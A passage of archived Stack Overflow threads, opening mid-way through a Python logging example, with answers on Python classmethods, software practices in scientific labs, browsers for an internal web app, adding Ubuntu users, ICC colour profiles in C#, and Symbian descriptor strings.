if cls.isLevel( Logger.WARN ) :
print "WARN : " + message
@classmethod
def error( cls, message ) :
if cls.isLevel( Logger.ERROR ) :
print "ERROR: " + message
@classmethod
def fatal( cls, message ) :
if cls.isLevel( Logger.FATAL ) :
print "FATAL: " + message
And some code that tests it just a bit:
def logAll() :
Logger.debug( "This is a Debug message." )
Logger.info ( "This is a Info message." )
Logger.warn ( "This is a Warn message." )
Logger.error( "This is a Error message." )
Logger.fatal( "This is a Fatal message." )
if __name__ == '__main__' :
print "Should see all DEBUG and higher"
Logger._level = Logger.DEBUG
logAll()
print "Should see all ERROR and higher"
Logger._level = Logger.ERROR
logAll()
A: Alternative constructors are the classic example.
A: Class methods are for when you need to have methods that aren't specific to any particular instance, but still involve the class in some way. The most interesting thing about them is that they can be overridden by subclasses, something that's simply not possible in Java's static methods or Python's module-level functions.
If you have a class MyClass, and a module-level function that operates on MyClass (factory, dependency injection stub, etc), make it a classmethod. Then it'll be available to subclasses.
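A hedged sketch of that point, using made-up names (Report, SummaryReport, from_csv): turning a module-level factory into a classmethod means subclasses inherit it and get instances of the right type automatically.
class Report:
    def __init__(self, rows):
        self.rows = rows

    @classmethod
    def from_csv(cls, path):
        # Because cls is used (not Report), SummaryReport.from_csv() builds a SummaryReport.
        with open(path) as f:
            rows = [line.rstrip("\n").split(",") for line in f]
        return cls(rows)

class SummaryReport(Report):
    def total(self):
        return len(self.rows)

# report = SummaryReport.from_csv("data.csv")  # inherited factory, returns a SummaryReport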
A: This is an interesting topic. My take on it is that a Python classmethod operates like a singleton rather than a factory (which returns a newly produced instance of a class). The reason it is singleton-like is that there is a common object that is produced (the dictionary), only once for the class, but shared by all instances.
To illustrate this here is an example. Note that all instances have a reference to the single dictionary. This is not Factory pattern as I understand it. This is probably very unique to python.
class M():
@classmethod
def m(cls, arg):
print "arg was", getattr(cls, "arg" , None),
cls.arg = arg
print "arg is" , cls.arg
M.m(1) # prints arg was None arg is 1
M.m(2) # prints arg was 1 arg is 2
m1 = M()
m2 = M()
m1.m(3) # prints arg was 2 arg is 3
m2.m(4) # prints arg was 3 arg is 4 << this breaks the factory pattern theory.
M.m(5) # prints arg was 4 arg is 5
A: I was asking myself the same question a few times. And even though the guys here tried hard to explain it, IMHO the best (and simplest) answer I have found is the description of the class method in the Python documentation.
There is also a reference to the static method. And in case someone already knows instance methods (which I assume), this answer might be the final piece to put it all together...
Further and deeper elaboration on this topic can be found also in the documentation:
The standard type hierarchy (scroll down to Instance methods section)
A: It allows you to write generic class methods that you can use with any compatible class.
For example:
@classmethod
def get_name(cls):
print cls.name
class C:
name = "tester"
C.get_name = get_name
#call it:
C.get_name()
If you don't use @classmethod you can do it with the self keyword, but it needs an instance of the class:
def get_name(self):
print self.name
class C:
name = "tester"
C.get_name = get_name
#call it:
C().get_name() #<- note that it's an instance of class C
A: I think the clearest answer is AmanKow's. It boils down to how you want to organize your code. You can write everything as module-level functions, which are wrapped in the namespace of the module, i.e.
module.py (file 1)
---------
def f1() : pass
def f2() : pass
def f3() : pass
usage.py (file 2)
--------
from module import *
f1()
f2()
f3()
def f4():pass
def f5():pass
usage1.py (file 3)
-------------------
from usage import f4,f5
f4()
f5()
The above procedural code is not well organized; as you can see, after only 3 modules it gets confusing: what does each method do? You can use long descriptive names for functions (like in Java), but your code still becomes unmanageable very quickly.
The object-oriented way is to break your code down into manageable blocks, i.e. classes and objects, and functions can be associated with object instances or with classes.
With class functions you gain another level of division in your code compared with module level functions.
So you can group related functions within a class to make them more specific to a task that you assigned to that class. For example you can create a file utility class :
class FileUtil ():
def copy(source,dest):pass
def move(source,dest):pass
def copyDir(source,dest):pass
def moveDir(source,dest):pass
//usage
FileUtil.copy("1.txt","2.txt")
FileUtil.moveDir("dir1","dir2")
This way is more flexible and more maintainable: you group functions together, and it's more obvious what each function does. You also prevent name conflicts; for example, the function copy may exist in another imported module (for example, network copy) that you use in your code, so by using the full name FileUtil.copy() you remove the ambiguity and both copy functions can be used side by side.
A: When a user logs in on my website, a User() object is instantiated from the username and password.
If I need a user object without the user being there to log in (e.g. an admin user might want to delete another user's account, so I need to instantiate that user and call its delete method):
I have class methods to grab the user object.
class User():
#lots of code
#...
# more code
@classmethod
def get_by_username(cls, username):
return cls.query(cls.username == username).get()
@classmethod
def get_by_auth_id(cls, auth_id):
return cls.query(cls.auth_id == auth_id).get()
A: @classmethod can be useful for easily instantiating objects of that class from outside resources. Consider the following:
import settings
class SomeClass:
@classmethod
def from_settings(cls):
return cls(settings=settings)
def __init__(self, settings=None):
if settings is not None:
self.x = settings['x']
self.y = settings['y']
Then in another file:
from some_package import SomeClass
inst = SomeClass.from_settings()
Accessing inst.x will give the same value as settings['x'].
A: A class defines a set of instances, of course, and the methods of a class work on the individual instances. The class methods (and variables) are a place to hang other information that is related to the set of instances overall.
For example, if your class defines the set of students, you might want class variables or methods which define things like the set of grades the students can be members of.
You can also use class methods to define tools for working on the entire set. For example, Student.all_of_em() might return all the known students. Obviously if your set of instances has more structure than just a set, you can provide class methods to know about that structure: Student.all_of_em(grade='juniors')
Techniques like this tend to lead to storing members of the set of instances into data structures that are rooted in class variables. You need to take care to avoid frustrating the garbage collection then.
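A rough sketch of what such a class-level registry might look like; Student and all_of_em follow the naming above, while the _all class variable is my own assumption. The strong references held in that class variable are exactly what the garbage-collection caveat is about.
class Student:
    _all = []                      # class variable rooting the set of instances

    def __init__(self, name, grade):
        self.name, self.grade = name, grade
        Student._all.append(self)  # note: keeps a strong reference to every instance

    @classmethod
    def all_of_em(cls, grade=None):
        if grade is None:
            return list(cls._all)
        return [s for s in cls._all if s.grade == grade]

Student("Ada", "juniors")
Student("Grace", "seniors")
print(len(Student.all_of_em()))                 # -> 2
print(len(Student.all_of_em(grade="juniors")))  # -> 1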
A: Classes and Objects concepts are very useful in organizing things. It's true that all the operations that can be done by a method can also be done using a static function.
Just think of a scenario, to build a Students Databases System to maintain student details.
You need to have details about students, teachers and staff. You need to build functions to calculate fees, salary, marks, etc. Fees and marks are only applicable for students, salary is only applicable for staff and teachers. So if you create separate classes for every type of people, the code will be organized.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38238",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "288"
} |
Q: Practices for programming in a scientific environment? Background
Last year, I did an internship in a physics research group at a university. In this group, we mostly used LabVIEW to write programs for controlling our setups, doing data acquisition and analyzing our data. For the first two purposes, that works quite OK, but for data analysis, it's a real pain. On top of that, everyone was mostly self-taught, so code that was written was generally quite a mess (no wonder that every PhD quickly decided to rewrite everything from scratch). Version control was unknown, and impossible to set up because of strict software and network regulations from the IT department.
Now, things actually worked out surprisingly OK, but how do people in the natural sciences do their software development?
Questions
Some concrete questions:
*
*What languages/environments have you used for developing scientific software, especially data analysis? What libraries? (for example, what do you use for plotting?)
*Was there any training for people without any significant background in programming?
*Did you have anything like version control, and bug tracking?
*How would you go about trying to create a decent environment for programming, without getting too much in the way of the individual scientists (especially physicists are stubborn people!)
Summary of answers thus far
The answers (or my interpretation of them) thus far: (2008-10-11)
*
*Languages/packages that seem to be the most widely used:
*
*LabVIEW
*Python
*
*with SciPy, NumPy, PyLab, etc. (See also Brandon's reply for downloads and links)
*C/C++
*MATLAB
*Version control is used by nearly all respondents; bug tracking and other processes are much less common.
*The Software Carpentry course is a good way to teach programming and development techniques to scientists.
*How to improve things?
*
*Don't force people to follow strict protocols.
*Set up an environment yourself, and show the benefits to others. Help them to start working with version control, bug tracking, etc. themselves.
*Reviewing other people's code can help, but be aware that not everyone may appreciate that.
A: I'm not exactly a 'natural' scientist (I study transportation) but am an academic who writes a lot of my own software for data analysis. I try to write as much as I can in Python, but sometimes I'm forced to use other languages when I'm working on extending or customizing an existing software tool. There is very little programming training in my field. Most folks are either self-taught, or learned their programming skills from classes taken previously or outside the discipline.
I'm a big fan of version control. I used Vault running on my home server for all the code for my dissertation. Right now I'm trying to get the department to set up a Subversion server, but my guess is I will be the only one who uses it, at least at first. I've played around a bit with FogBugs, but unlike version control, I don't think that's nearly as useful for a one-man team.
As for encouraging others to use version control and the like, that's really the problem I'm facing now. I'm planning on forcing my grad students to use it on research projects they're doing for me, and encouraging them to use it for their own research. If I teach a class involving programming, I'll probably force the students to use version control there too (grading them on what's in the repository). As far as my colleagues and their grad students go, all I can really do is make a server available and rely on gentle persuasion and setting a good example. Frankly, at this point I think it's more important to get them doing regular backups than get them on source control (some folks are carrying around the only copy of their research data on USB flash drives).
A: 1.) Scripting languages are popular these days for most things due to better hardware. Perl/Python/Lisp are prevalent for lightweight applications (automation, light computation); I see a lot of Perl at my work (computational EM) since we like Unix/Linux. For performance stuff, C/C++/Fortran are typically used. For parallel computing, well, we usually manually parallelize runs in EM as opposed to having a program implicitly do it (ie split up the jobs by look angle when computing radar cross sections).
2.) We just kind of throw people into the mix here. A lot of the code we have is very messy, but scientists are typically a scatterbrained bunch that don't mind that sort of thing. Not ideal, but we have things to deliver and we're severely understaffed. We're slowly getting better.
3.) We use SVN; however, we do not have bug tracking software. About as good as it gets for us is a txt file that tells you where specific bugs are.
4.) My suggestion for implementing best practices for scientists: do it slowly. As scientists, we typically don't ship products. No one in science makes a name for himself by having clean, maintainable code. They get recognition from the results of that code, typically. They need to see justification for spending time on learning software practices. Slowly introduce new concepts and try to get them to follow; they're scientists, so after their own empirical evidence confirms the usefulness of things like version control, they will begin to use it all the time!
A: I'd highly recommend reading "What Every Computer Scientist Should Know About Floating-Point Arithmetic". A lot of problems I encounter on a regular basis come from issues with floating point programming.
A: I am a physicist working in the field of condensed matter physics, building classical and quantum models.
Languages:
*
*C++ -- very versatile: can be used for anything, good speed, but it can be a bit inconvenient when it comes to MPI
*Octave -- good for some supplementary calculations, very convenient and productive
Libraries:
*
*Armadillo/Blitz++ -- fast array/matrix/cube abstractions for C++
*Eigen/Armadillo -- linear algebra
*GSL -- to use with C
*LAPACK/BLAS/ATLAS -- extremely big and fast, but less convenient (and written in FORTRAN)
Graphics:
*
*GNUPlot -- it has very clean and neat output, but not that productive sometimes
*Origin -- very convenient for plotting
Development tools:
*
*Vim + plugins -- it works great for me
*GDB -- a great debugging tool when working with C/C++
*Code::Blocks -- I used it for some time and found it quite comfortable, but Vim is still better in my opinion.
A:
What languages/environments have you used for developing scientific software, esp. data analysis? What libraries? (E.g., what do you use for plotting?)
Python, NumPy and pylab (plotting).
Was there any training for people without any significant background in programming?
No, but I was working in a multimedia research lab, so almost everybody had a computer science background.
Did you have anything like version control, bug tracking?
Yes, Subversion for version control, Trac for bug tracing and wiki. You can get free bug tracker/version control hosting from http://www.assembla.com/ if their TOS fits your project.
How would you go about trying to create a decent environment for programming, without getting too much in the way of the individual scientists (esp. physicists are stubborn people!).
Make sure the infrastructure is set up and well maintained and try to sell the benefits of source control.
A: Ex-academic physicist and now industrial physicist UK here:
What languages/environments have you used for developing scientific software, esp. data analysis? What libraries? (E.g., what do you use for plotting?)
I mainly use MATLAB these days (easy to access visualisation functions and maths). I used to use Fortran a lot and IDL. I have used C (but I'm more a reader than a writer of C), Excel macros (ugly and confusing). I'm currently needing to be able to read Java and C++ (but I can't really program in them) and I've hacked Python as well. For my own entertainment I'm now doing some programming in C# (mainly to get portability / low cost / pretty interfaces). I can write Fortran with pretty much any language I'm presented with ;-)
Was there any training for people without any significant background in programming?
Most (all?) undergraduate physics course will have a small programming course usually on C, Fortran or MATLAB but it's the real basics. I'd really like to have had some training in software engineering at some point (revision control / testing / designing medium scale systems)
Did you have anything like version control, bug tracking?
I started using Subversion / TortoiseSVN relatively recently. Groups I've worked with in the past have used revision control. I don't know any academic group which uses formal bug tracking software. I still don't use any sort of systematic testing.
How would you go about trying to create a decent environment for programming, without getting too much in the way of the individual scientists (esp. physicists are stubborn people!)
I would try to introduce some software engineering ideas at undergraduate level and then reinforce them by practice at graduate level, also provide pointers to resources like the Software Carpentry course mentioned above.
I'd expect that a significant fraction of academic physicists will be writing software (not necessarily all though) and they are in dire need of at least an introduction to ideas in software engineering.
A: I work as a physicist in a UK university.
Perhaps I should emphasise that different areas of research have different emphasis on programming. Particle physicists (like dmckee) do computational modelling almost exclusively and may collaborate on large software projects, whereas people in fields like my own (condensed matter) write code relatively infrequently. I suspect most scientists fall into the latter camp. I would say coding skills are usually seen as useful in physics, but not essential, much like physics/maths skills are seen as useful for programmers but not essential. With this in mind...
*
*What languages/environments have you used for developing scientific software, esp. data analysis? What libraries? (E.g., what do you use for plotting?)
Commonly, data analysis and plotting are done using generic data analysis packages such as IGOR Pro, ORIGIN, or Kaleidegraph, which can be thought of as 'Excel plus'. These packages typically have a scripting language that can be used to automate. More specialist analysis may have a dedicated utility for the job that generally was written a long time ago, that no one has the source for, and that is pretty buggy. Some more techie types might use the languages that have been mentioned (Python, R, MatLab with Gnuplot for plotting).
Control software is commonly done in LabVIEW, although we actually use Delphi which is somewhat unusual.
*
*Was there any training for people without any significant background in programming?
I've been to seminars on grid computing, 3D visualisation, learning Boost etc. given by both universities I've been at. As an undergraduate we were taught VBA for Excel and MatLab but C/MatLab/LabVIEW is more common.
*
*Did you have anything like version control, bug tracking?
No, although people do have personal development setups. Our code base is in a shared folder on a 'server' which is kept current with a synching tool.
*
*How would you go about trying to create a decent environment for programming, without getting too much in the way of the individual scientists (esp. physicists are stubborn people!)
One step at a time! I am trying to replace the shared folder with something a bit more solid; perhaps finding an SVN client which mimics the current synching tool's behaviour would help.
I'd say though on the whole, for most natural science projects, time is generally better spent doing research!
A: I'm a statistician at a university in the UK. Generally people here use R for data analysis, it's fairly easy to learn if you know C/Perl. Its real power is in the way you can import and modify data interactively. It's very easy to take a number of say CSV (or Excel) files and merge them, create new columns based on others and then throw that into a GLM, GAM or some other model. Plotting is trivial too and doesn't require knowledge of a whole new language (like PGPLOT or GNUPLOT.) Of course, you also have the advantage of having a bunch of built-in features (from simple things like mean, standard deviation etc all the way to neural networks, splines and GL plotting.)
Having said this, there are a couple of issues. With very large datasets R can become very slow (I've only really seen this with >50,000x30 datasets) and since it's interpreted you don't get the advantage of Fortran/C in this respect. But, you can (very easily) get R to call C and Fortran shared libraries (either from something like netlib or ones you've written yourself.) So, a usual workflow would be to:
*
*Work out what to do.
*Prototype the code in R.
*Run some preliminary analyses.
*Re-write the slow code into C or Fortran and call that from R.
Which works very well for me.
I'm one of the only people in my department (of >100 people) using version control (in my case using git with github.com.) This is rather worrying, but they just don't seem to be keen on trying it out and are content with passing zip files around (yuck.)
My suggestion would be to continue using LabVIEW for the acquisition (and perhaps trying to get your co-workers to agree on a toolset for acquisition and making it available for all) and then move to exporting the data into a CSV (or similar) and doing the analysis in R. There's really very little point in re-inventing the wheel in this respect.
A: What languages/environments have you used for developing scientific software, esp. data analysis? What libraries? (E.g., what do you use for plotting?)
I used to work for Enthought, the primary corporate sponsor of SciPy. We collaborated with scientists from the companies that contracted Enthought for custom software development. Python/SciPy seemed to be a comfortable environment for scientists. It's much less intimidating to get started with than say C++ or Java if you're a scientist without a software background.
The Enthought Python Distribution comes with all the scientific computing libraries including analysis, plotting, 3D visualation, etc.
Was there any training for people without any significant background in programming?
Enthought does offer SciPy training and the SciPy community is pretty good about answering questions on the mailing lists.
Did you have anything like version control, bug tracking?
Yes, and yes (Subversion and Trac). Since we were working collaboratively with the scientists (and typically remotely from them), version control and bug tracking were essential. It took some coaching to get some scientists to internalize the benefits of version control.
How would you go about trying to create a decent environment for programming, without getting too much in the way of the individual scientists (esp. physicists are stubborn people!)
Make sure they are familiarized with the tool chain. It takes an investment up front, but it will make them feel less inclined to reject it in favor of something more familiar (Excel). When the tools fail them (and they will), make sure they have a place to go for help — mailing lists, user groups, other scientists and software developers in the organization. The more help there is to get them back to doing physics the better.
A: The course Software Carpentry is aimed specifically at people doing scientific computing and aims to teach the basics and lessons of software engineering, and how best to apply them to projects.
It covers topics like version control, debugging, testing, scripting and various other issues.
I've listened to about 8 or 9 of the lectures and think it is to be highly recommended.
Edit: The MP3s of the lectures are available as well.
A: Definitely, use Subversion to keep current, work-in-progress, and stable snapshot copies of source code. This includes C++, Java etc. for homegrown software tools, and quickie scripts for one-off processing.
With the strong leaning in science and applied engineering toward "lone cowboy" development methodology, the usual practice of organizing the repository into trunk, tag and whatever else it was - don't bother! Scientists and their lab technicians like to twirl knobs, wiggle electrodes and chase vacuum leaks. It's enough of a job to get everyone to agree to, say Python/NumPy or follow some naming convention; forget trying to make them follow arcane software developer practices and conventions.
A: For source code management, centralized systems such as Subversion are superior for scientific use due to the clear single point of truth (SPOT). Logging of changes and ability to recall versions of any file, without having chase down where to find something, has huge record-keeping advantages. Tools like Git and Monotone: oh my gosh the chaos I can imagine that would follow! Having clear-cut records of just what version of hack-job scripts were used while toying with the new sensor when that Higgs boson went by or that supernova blew up, will lead to happiness.
A: What languages/environments have you used for developing scientific software, esp. data analysis? What libraries? (E.g., what do you use for plotting?)
My undergraduate physics department taught LabVIEW classes and used it extensively in its research projects.
The other alternative is MATLAB, in which I have no experience. There are camps for either product; each has its own advantages/disadvantages. Depending on what kind of problems you need to solve, one package may be more preferable than the other.
Regarding data analysis, you can use whatever kind of number cruncher you want. Ideally, you can do the hard calculations in language X and format the output to plot nicely in Excel, Mathcad, Mathematica, or whatever the flavor du jour plotting system is. Don't expect standardization here.
Did you have anything like version control, bug tracking?
Looking back, we didn't, and it would have been easier for us all if we did. Nothing like breaking everything and struggling for hours to fix it!
Definitely use source control for any common code. Encourage individuals to write their code in a manner that could be made more generic. This is really just coding best practices. Really, you should have them teaching (or taking) a computer science class so they can get the basics.
How would you go about trying to create a decent environment for programming, without getting too much in the way of the individual scientists (esp. physicists are stubborn people!)
There is a clear split between data acquisition (DAQ) and data analysis. Meaning, it's possible to standardize on the DAQ and then allow the scientists to play with the data in the program of their choice.
A: Another good option is Scilab. It has graphic modules à la LabVIEW, it has its own programming language and you can also embed Fortran and C code, for example. It's being used in public and private sectors, including big industrial companies. And it's free.
About versioning, some prefer Mercurial, as it gives more liberties managing and defining the repositories. I have no experience with it, however.
For plotting I use Matplotlib. I will soon have to make animations, and I've seen good results using MEncoder. Here is an example including an audio track.
Finally, I suggest going modular, that is, trying to keep the main pieces of code in different files, so code revision, understanding, maintenance and improvement will be easier. I have written, for example, a Python module for file integrity testing, another for image processing sequences, etc.
You should also consider developing with the use of a debugger that allows you to check variable contents at settable breakpoints in the code, instead of using print lines.
I have used Eclipse for Python and Fortran developing (although I got a false bug compiling a Fortran short program with it, but it may have been a bad configuration) and I'm starting to use the Eric IDE for Python. It allows you to debug, manage versioning with SVN, it has an embedded console, it can do refactoring with Bicycle Repair Man (it can use another one, too), you have Unittest, etc. A lighter alternative for Python is IDLE, included with Python since version 2.3.
As a few hints, I also suggest:
*
*Not using single-character variables. When you want to search for occurrences, you will get results everywhere. Some argue that a decent IDE makes this easier, but then you will depend on having permanent access to the IDE. Even using ii, jj and kk can be enough, although this choice will depend on your language. (Double vowels would be less useful if code comments are made in Estonian, for instance).
*Commenting the code from the very beginning.
*For critical applications sometimes it's better to rely on older language/compiler versions (major releases), more stable and better debugged.
Of course you can have more optimized code in later versions, fixed bugs, etc., but I'm talking about using Fortran 95 instead of 2003, Python 2.5.4 instead of 3.0, and so on. (Especially when a new version breaks backwards compatibility.) Lots of improvements usually introduce lots of bugs. Still, this will depend on specific application cases!
Note that this is a personal choice, many people could argue against this.
*Use redundant and automated backup! (With versioning control).
A:
What languages/environments have you used for developing scientific software, esp. data analysis? What libraries? (E.g., what do you use for plotting?)
Languages I have used for numerics and scientific-related stuff:
*
*C (slow development, too much debugging, almost impossible to write reusable code)
*C++ (and I learned to hate it -- development isn't as slow as C, but it can be a pain. Templates and classes were cool initially, but after a while I realized that I was fighting them all the time and finding workarounds for language design problems)
*Common Lisp, which was OK, but not widely used for scientific computing. Not easy to integrate with C (compared to other languages), but it works
*Scheme. This one became my personal choice.
My editor is Emacs, although I do use vim for quick stuff like editing configuration files.
For plotting, I usually generate a text file and feed it into gnuplot.
For data analysis, I usually generate a text file and use GNU R.
I see lots of people here using FORTRAN (mostly 77, but some 90), lots of Java and some Python. I don't like those, so I don't use them.
Was there any training for people without any significant background in programming?
I think this doesn't apply to me, since I graduated in CS -- but where I work there is no formal training, but people (Engineers, Physicists, Mathematicians) do help each other.
Did you have anything like version control, bug tracking?
Version control is absolutely important! I keep my code and data in three different machines, in two different sides of the world -- in Git repositories. I sync them all the time (so I have version control and backups!) I don't do bug control, although I may start doing that.
But my colleagues don't use a BTS or VCS at all.
How would you go about trying to create a decent environment for programming, without getting too much in the way of the individual scientists (esp. physicists are stubborn people!)
First, I'd give them as much freedom as possible. (In the university where I work I could choose between having someone install Ubuntu or Windows, or installing my own OS -- I chose to install my own. I don't have support from them and I'm responsible for anything that happens with my machine, including security issues, but I do whatever I want with it.)
Second, I'd see what they are used to, and make it work (need FORTRAN? We'll set it up. Need C++? No problem. Mathematica? OK, we'll buy a license). Then see how many of them would like to learn "additional tools" to help them be more productive (don't say "different" tools. Say "additional", so it won't seem like anyone will "lose" or "let go" or whatever). Start with editors, see if there are groups who would like to use VCS to sync their work (hey, you can stay home and send your code through SVN or GIT -- wouldn't that be great?) and so on.
Don't impose -- show examples of how cool these tools are. Make data analysis using R, and show them how easy it was. Show nice graphics, and explain how you've created them (but start with simple examples, so you can quickly explain them).
A: I would suggest F# as a potential candidate for performing science-related manipulations given its strong semantic ties to mathematical constructs.
Also, its support for units-of-measure, as written about here makes a lot of sense for ensuring proper translation between mathematical model and implementation source code.
A: Nuclear/particle physics here.
*
*Major programming work used to be done mostly in Fortran using CERNLIB (PAW, MINUIT, ...) and GEANT3; recently it has mostly been done in C++ with ROOT and Geant4. There are a number of other libraries and tools in specialized use, and LabVIEW sees some use here and there.
*Data acquisition in my end of this business has often meant fairly low level work. Often in C, sometimes even in assembly, but this is dying out as the hardware gets more capable. On the other hand, many of the boards are now built with FPGAs which need gate twiddling...
*One-offs, graphical interfaces, etc. use almost anything (Tcl/Tk used to be big, and I've been seeing more Perl/Tk and Python/Tk lately) including a number of packages that exist mostly inside the particle physics community.
*Many people writing code have little or no formal training, and process is transmitted very unevenly by oral tradition, but most of the software group leaders take process seriously and read as much as necessary to make up their deficiencies in this area.
*Version control for the main tools is ubiquitous. But many individual programmers neglect it for their smaller tasks. Formal bug tracking tools are less common, as are nightly builds, unit testing, and regression tests.
To improve things:
*
*Get on the good side of the local software leaders
*Implement the process you want to use in your own area, and encourage those you let in to use it too.
*Wait. Physicists are empirical people. If it helps, they will (eventually!) notice.
One more suggestion for improving things.
*Put a little time in to helping anyone you work directly with. Review their code. Tell them about algorithmic complexity/code generation/DRY or whatever basic thing they never learned because some professor threw a Fortran book at them once and said "make it work". Indoctrinate them on process issues. They are smart people, and they will learn if you give them a chance.
A: This might be slightly tangential, but hopefully relevant.
I used to work for National Instruments, R&D, where I wrote software for NI RF & Communication toolkits. We used LabVIEW quite a bit, and here are the practices we followed:
*
*Source control. NI uses Perforce. We did the regular thing - dev/trunk branches, continuous integration, the works.
*We wrote automated test suites.
*We had a few people who came in with a background in signal processing and communication. We used to have regular code reviews, and best practices documents to make sure their code was up to the mark.
*Despite the code reviews, there were a few occasions when "software guys", like me had to rewrite some of this code for efficiency.
*I know exactly what you mean about stubborn people! We had folks who used to think that pointing out a potential performance improvement in their code was a direct personal insult! It goes without saying that this calls for good management. I thought the best way to deal with these folks is to go slowly, not press too hard for changes, and if necessary be prepared to do the dirty work. [Example: write a test suite for their code].
A: I'm no expert in this area, but I've always understood that this is what MATLAB was created for. There is a way to integrate MATLAB with SVN for source control as well.
A: First of all, I would definitely go with a scripting language to avoid having to explain a lot of extra things (for example manual memory management is - mostly - ok if you are writing low-level, performance sensitive stuff, but for somebody who just wants to use a computer as an upgraded scientific calculator it's definitely overkill). Also, look around if there is something specific for your domain (as is R for statistics). This has the advantage of already working with the concepts the users are familiar with and having specialized code for specific situations (for example calculating standard deviations, applying statistical tests, etc in the case of R).
If you wish to use a more generic scripting language, I would go with Python. Two things it has going for it are:
*
*The interactive shell where you can experiment
*Its clear (although sometimes lengthy) syntax
As an added advantage, it has libraries for most of the things you would want to do with it.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38239",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "92"
} |
Q: Best browser for web application I am in a position where I can choose the client browser for my web app. The app is being used internally, and we are installing each client "manually". I would like to find a better solution for the browser, so:
What is a good browser that I can use as a client to a web application?
General functionalities I would like to have:
*
*opening the browser from a
shortcut, directly to the application's URL
*ability to restrict navigation to a set of allowed URLs
*fullscreen mode, no menu, no address bar
*javascript
*good CSS support
*ability to cancel Back button (or at least solve the "Webpage has expired" IE problem)
IE7 and Firefox are good candidates, but each seems to have its own problems and issues.
A: Mozilla Prism seems ideal for your purposes.
It shares code with Firefox but is designed to run web applications without the usual Browser interface to make them appear more like desktop applications. So no back button or address bar to worry about.
Edit: Google Chrome has Application Shortcuts so that may now be a better option.
A: Your last point, solving the "webpage has expired" problem, can be solved entirely on the server side by judicious use of the "303 see other" HTTP status code. Instead of returning a new page immediately as the result of an HTTP POST, return a 303 result code that redirects to another page that is a GET, that gets the contents you would like to show. This allows the user to use the back button without getting that expired message.
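A minimal sketch of that post/redirect/get pattern in PHP (the file names and the save function here are placeholders for whatever your app actually does):
<?php
// handle-form.php: process the POST, then answer with 303 so that
// Back/Refresh never re-submits the form
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    save_submission($_POST);                      // hypothetical application function
    header('Location: /result.php', true, 303);   // 303 See Other -> browser issues a GET
    exit;
}
?>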
A: Because of your specific requirements you might want to consider embedding the IE ActiveX into a desktop application. That way you get full control of the client.
A: Firefox with a little elbow grease is your best bet. I've written locked down extensions (one that's full screen and great for digital signage) as well as Live CD to ease deployment.
A: Firefox:
*
*multi-platform
*kiosk add-on
*patch the chrome logic with zip and javascript
*see the FF 3.1 javascript speed improvements
*easily deploy standard bookmarks
A: Although I realize this may not be an option yet, Google Chrome seems to have some features that have been added specifically to allow that. Again, maybe not usable, yet, but certainly very interesting!
(See also the Chrome presentation, 27:30)
A: Some other reasons to choose Firefox:
*
*Firebug
*Web Developer
*Tamper Data
These addons make it a lot easier to develop web application for.
A: Until people have more experience with Google Chrome I would think Firefox is a better choice. It is extendable, well supported.
I like Chrome, but Google just has the tendency to have long beta periods and sometimes abandons projects.
A: When you run into serious issues, with Firefox you can trace it down to the code and maybe get someone to fix it. With IE, you can't.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38280",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: How do I add a user in Ubuntu? Specifically, what commands do I run from the terminal?
A: Here's the command I almost always use (adding user kevin):
useradd -d /home/kevin -s /bin/bash -m kevin
A: There are basically 2 commands to do this...
*
*useradd
*adduser (which is a friendlier front end to useradd)
You have to run them as root.
Just read their manuals to find out how to use them.
A: Without a home directory
sudo useradd myuser
With home directory
sudo useradd -m myuser
Then set the password
sudo passwd myuser
Then set the shell
sudo usermod -s /bin/bash myuser
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38288",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "66"
} |
Q: Apply an ICC Color Profile to an image in C# (Dotnet) How does one convert an image from one color profile to another (screen to printer, or scanner to screen). In Visual C++ you would use the function in ICM.h, is there a managed way to do this with GDI+?
I need to use GDI+, not WPF. I'd prefer to have a managed solution, but if it is not available, I guess PInvoke will have to suffice.
A: There are a number of solutions.
*
*For GDI+, check out this article at MSDN (HOW TO: Use GDI+ and Image Color Management to Adjust Image Colors).
*For WPF (.NET 3.0), see the System.Windows.Media namespace. There are a number of different classes, such as the BitmapEncoder, that have the concept of a ColorContext, which "Represents the International Color Consortium (ICC) or Image Color Management (ICM) color profile that is associated with a bitmap image."
Both of these seem pretty complex, so there's always the option of buying somebody else's code. Atalasoft's DotImage Photo Pro has ICC profile setting capabilities built in. The code is expensive; a dev license is almost 2k. But based on their participation in the dotnet community, I'd give them a whirl.
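On the GDI+ side, one small, related capability that is easy to miss: the Bitmap constructor can honour an embedded ICC profile when loading a file. This only covers the "convert on load" case, not full device-to-device conversion (the MSDN article above covers that), and the file name here is just an example:
// true = use Image Color Management, i.e. apply the embedded ICC profile while decoding
Bitmap corrected = new Bitmap(@"C:\photos\scan.jpg", true);
// 'corrected' now holds the colour-managed pixels and can be drawn or saved as usual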
A: You should take a look at Lcms. It's a colour management system, fairly complete, but written in C. You can use P/Invoke, but I would recommend a Managed C++ wrapper. I am actually currently working on a managed wrapper around the engine (just the basics: colour profile conversion, Lab readings). I can post a link to the code after I am done. It may be a week or so though.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38295",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: Tutorial on understanding strings in Symbian I have Carbide.c++ Developer from Nokia and I want to create applications for my S60 phone.
I've looked at the samples that goes with the different SDK's for S60 but I haven't found any simple explanation on how strings, called descriptors, are used in Symbian.
One of the problems is that I'm visually impaired, and therefore it takes quite some time to read through large documents, paging up and down past lots of information I don't need, so I've given up.
I'm willing to give it another try. Can anyone help me?
A: Here are a few sites on blogspot that may help. They have RSS feeds that will hopefully be easier to consume than paging through PDFs.
*
*http://descriptor-tips.blogspot.com/
*http://descriptors.blogspot.com/
A: Yeah, the strings in Symbian are nightmarish... at least when you are starting out.
Here are a few good references to help:
*
*Introducing the RBuf Descriptor from Symbian Developer
*Comparing C strings and descriptors from Forum Nokia discussion
*Using Symbian OS String Descriptors from NewLC
A: I'd second http://descriptors.blogspot.com/ This is invaluable for getting to grips with Descriptors.
Also, sites such as newlc.com have forums for Symbian C++ specific code problems.
